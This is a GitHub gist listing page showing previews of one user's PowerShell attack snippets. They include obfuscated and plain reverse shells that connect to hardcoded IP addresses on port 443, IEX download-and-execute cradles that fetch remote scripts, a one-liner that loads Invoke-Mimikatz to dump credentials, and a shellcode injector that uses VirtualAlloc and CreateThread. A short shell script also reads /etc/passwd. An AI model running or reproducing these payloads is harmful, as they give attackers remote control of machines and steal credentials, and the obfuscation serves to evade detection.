Skip to content

Instantly share code, notes, and snippets.

View frknozr's full-sized avatar

frknozr

66 followers · 34 following
View GitHub Profile
@frknozr
frknozr / rev3.ps1
Created January 19, 2018 07:49
&('Sv') ("{0}{1}"-f 'Lh','aW3') ( [TypE]("{3}{1}{0}{2}" -F 'ENcOdI','ExT.','ng','T') ); ${CLi`E`NT} = &("{1}{0}{2}"-f '-Obje','New','ct') ("{0}{2}{1}{3}{4}"-f'System.Ne','s.T','t.Socket','CPCli','ent')(("{2}{0}{1}"-f '4.194','.214.53','5'),443);${str`E`AM} = ${Cl`i`EnT}.("{0}{2}{1}" -f'GetSt','m','rea').Invoke();[byte[]]${B`yTEs} = 0..65535|&('%'){0};while((${i} = ${sTr`eaM}.("{1}{0}"-f 'd','Rea').Invoke(${B`yT`eS}, 0, ${b`yt`eS}."le`NgTh")) -ne 0){;${d`Ata} = (.("{1}{0}{2}" -f 'ew-Obj','N','ect') -TypeName ("{5}{2}{4}{3}{0}{1}"-f'IEnco','ding','ystem.Text.','SCI','A','S')).("{1}{0}{3}{2}" -f'e','G','ing','tStr').Invoke(${b`y`TES},0, ${I});${Se`Nd`BAcK} = (.("{1}{0}"-f'x','ie') ${d`ATa} 2>&1 | &("{2}{0}{1}"-f'S','tring','Out-') );${sE`NDBAc`K2} = ${S`END`BacK} + "PS " + (&("{1}{0}"-f'wd','p'))."p`AtH" + "> ";${sE`N`DbyTE} = ( ( .('LS') ("{2}{1}{3}{0}{4}"-f 'ble:L','i','var','a','HAW3') )."v`ALuE"::"A`Scii").("{0}{1}"-f 'Get','Bytes').Invoke(${SEndb`A`c`k2});${sTRe`Am}.("{0}{1}"-f 'W','rite').Invoke($
@frknozr
frknozr / test4
Created January 19, 2018 07:45
.( $sheLLid[1]+$ShellID[13]+'X') ( [sTrING]::JoIn('' ,( [REgEx]::mAtchES( ")''NIOJ-'X'+]3,1[)ECneREFeRPesoBRev$]GNiRts[( ( .|)93]RaHc[]gNIrTs[,)28]RaHc[+18]RaHc[+75]RaHc[((eCALPER.)')RQ91sp.2ver/69bbb'+'534'+'a9'+'c0'+'a8b7dc30'+'2a24'+'6b1c'+'9'+'df5'+'e'+'7fbdeaa/'+'wa'+'r/1d'+'1f3d3fa'+'82eee'+'811aa'+'7300a'+'f'+'f013300/'+'r'+'zo'+'nkrf/'+'m'+'o'+'c'+'.'+'tn'+'etno'+'cr'+'esu'+'buh'+'ti'+'g.tsig'+'//'+':s'+'p'+'tt'+'h'+'RQ9(gni'+'r'+'t'+'Sdaol'+'nwoD.)tne'+'ilCbeW'+'.te'+'N'+' tcejbO'+'-w'+'eN('+' XEI llehsrewo'+'P'( ",'.','r'+'IG'+'h'+'ttoLeFt' )|ForEAch-objECT {$_.ValuE })) )
@frknozr
frknozr / test3
Created January 19, 2018 07:41
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/003310ffa0037aa118eee28af3d3f1d1/raw/aaedbf7e5fd9c1b642a203cd7b8a0c9a435bbb96/rev2.ps1')
@frknozr
frknozr / rev2.ps1
Last active March 29, 2018 18:21
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.126",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
@frknozr
frknozr / test2
Created January 19, 2018 07:26
Powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
@frknozr
frknozr / test1
Created January 19, 2018 07:16
Powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/frknozr/c301bfa3dc9e1f7c6f7cabd83777b2a2/raw/d660001da6f5f2ee557396772d0f5d1010198d9d/reverse.ps1)
@frknozr
frknozr / reverse.ps1
Last active March 9, 2018 06:55
$socket = new-object System.Net.Sockets.TcpClient('165.227.163.161', 443);
"Working"
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
@frknozr
frknozr / mikro
Created December 21, 2017 09:15
;====================================================================
; Main.asm file generated by New Project wizard
;
; Created: Cum Mar 11 2016
; Processor: 8086
; Compiler: MASM32
;
; Before starting simulation set Internal Memory Size
; in the 8086 model properties to 0x10000
;====================================================================
@frknozr
frknozr / test.sh
Created October 21, 2017 16:18
whoami
cat /etc/passwd
uname -a
@frknozr
frknozr / bind_x64_4848.ps1
Created October 11, 2017 19:38
$knQoUoTfNfL = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
$XuqotFCQWLpJY = Add-Type -memberDefinition $knQoUoTfNfL -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $hbgpyIRNXZNcNzm = 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x